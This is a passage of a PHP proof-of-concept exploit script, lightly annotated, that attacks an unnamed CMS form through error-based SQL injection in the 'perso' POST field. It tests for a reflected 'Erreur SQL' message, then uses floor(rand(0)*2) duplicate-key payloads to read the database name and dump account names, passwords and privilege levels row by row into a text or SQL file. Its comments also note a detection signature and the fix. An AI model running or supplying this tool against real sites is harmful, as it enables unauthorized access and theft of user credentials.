\n"; print "\nExample....: php $argv[0] localhost 80 / 1 txt "; print "\nExample....: php $argv[0] localhost 80 /site/ 3 sql \n"; die(); } /* Main body of a proof-of-concept for an error-based SQL injection in a CMS form (POST fields send=Envoyer and perso=...). The usage block that ends at the brace above starts before this fragment; postit()/PostIt() (one function: PHP function names are case-insensitive), fetch_data(), write_txt() and write_sql() are defined elsewhere in the file. The payloads below rely on two server-side conditions: the `perso` value reaches the SQL query unparameterised, and the raw MySQL error text ("Erreur SQL") is reflected to the client, which is the channel used to read data out. Prepared statements plus generic error pages remove both. */ /* Positional CLI arguments: host, port, request path, dump mode (1 or 2, see the switch below) and output format. */ $host = $argv[1]; $port = $argv[2]; $path = $argv[3]; $mode = $argv[4]; $file = $argv[5]; /* Output file name: "txt" selects accounts.txt, any other value selects accounts.sql. */ if($file == "txt") $file = "accounts.txt"; else $file = "accounts.sql"; /* $inj_test only has to provoke a SQL error. $inj_db is the error-based extraction payload reused by every later query: the duplicate-key trick (count(*) grouped by floor(rand(0)*2) over information_schema.tables) makes MySQL include the selected value, wrapped in the markers 0x7e,0x27 ("~'"), in its error message; here the value is database(). */ $inj_test = "or '1'='1"; $inj_db = " and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"; $payload = "send=Envoyer&perso=test".$inj_test.""; /* Vulnerability check: the target is treated as injectable iff the response contains the literal "Erreur SQL". Detection note: POST bodies carrying information_schema, floor(rand(0)*2) and "group by x" are a strong signature of this probe and of the dump loops below. */ if(!(preg_match("#Erreur SQL#", postit($host,$port, $path,$payload)))) die ("[-] CMS not vulnerable\n"); else print ("[+] CMS can be exploited!\n"); $payload = "send=Envoyer&perso=test".$inj_db.""; /* fetch_data() presumably extracts the text between the ~' ... '~ markers from the response body; its definition is not in this fragment, confirm there. */ $db = fetch_data(PostIt($host,$port,$path,$payload)); if(empty($db)) die("[-] Can't found the database!\n"); print "[+] Database: ".$db."\n"; /* Mode 1 dumps rows of `<db>`.accounts with level>0 (printed as admin accounts); mode 2 dumps every row. A mode value other than 1 or 2 matches no case and nothing is dumped. Each mode first reads count(*), then issues one request per row (LIMIT i,1), so a dump appears server-side as a burst of near-identical POSTs to the same path. */ switch ($mode) { case 1: $inj_count_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `".$db."`.accounts WHERE level>0)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"; $payload = "send=Envoyer&perso=test".$inj_count_accounts.""; $num = fetch_data(PostIt($host,$port,$path,$payload)); print "[+] Admin accounts: ".$num."\n"; for($i=0; $i<$num; $i++) { /* Row i is returned as account/pass/level joined by 0x2f ("/") inside the same markers. Whether `pass` holds a hash or a plaintext password cannot be told from here. */ $inj_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts WHERE level>0 LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"; $payload = "send=Envoyer&perso=test".$inj_accounts.""; $data = fetch_data(PostIt($host,$port,$path,$payload)); /* split() on the character class [/.-] separates the three fields. */ list($account, $pass, $level) = split('[/.-]', $data); print "Account: {$account}\t Pass: {$pass}\t Level: {$level}\n"; /* Persist the row through the writer matching the chosen format (helpers defined elsewhere). */ if($file == 
"accounts.txt") write_txt($file, $account, $pass, $level); else write_sql($file, $account, $pass, $level); } break; case 2: /* Same count-then-iterate extraction as mode 1, without the level>0 filter. */ $inj_count_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `".$db."`.accounts)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"; $payload = "send=Envoyer&perso=test".$inj_count_accounts.""; $num = fetch_data(PostIt($host,$port,$path,$payload)); print "[+] Accounts: ".$num."\n"; for($i=0; $i<$num; $i++) { $inj_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"; $payload = "send=Envoyer&perso=test".$inj_accounts.""; $data = fetch_data(PostIt($host,$port,$path,$payload)); list($account, $pass, $level) = split('[/.-]', $data); print "Account: {$account}\t Pass: {$pass}\t Level: {$level}\n"; if($file == "accounts.txt") write_txt($file, $account, $pass, $level); else write_sql($file, $account, $pass, $level); } break; } /* end switch($mode) */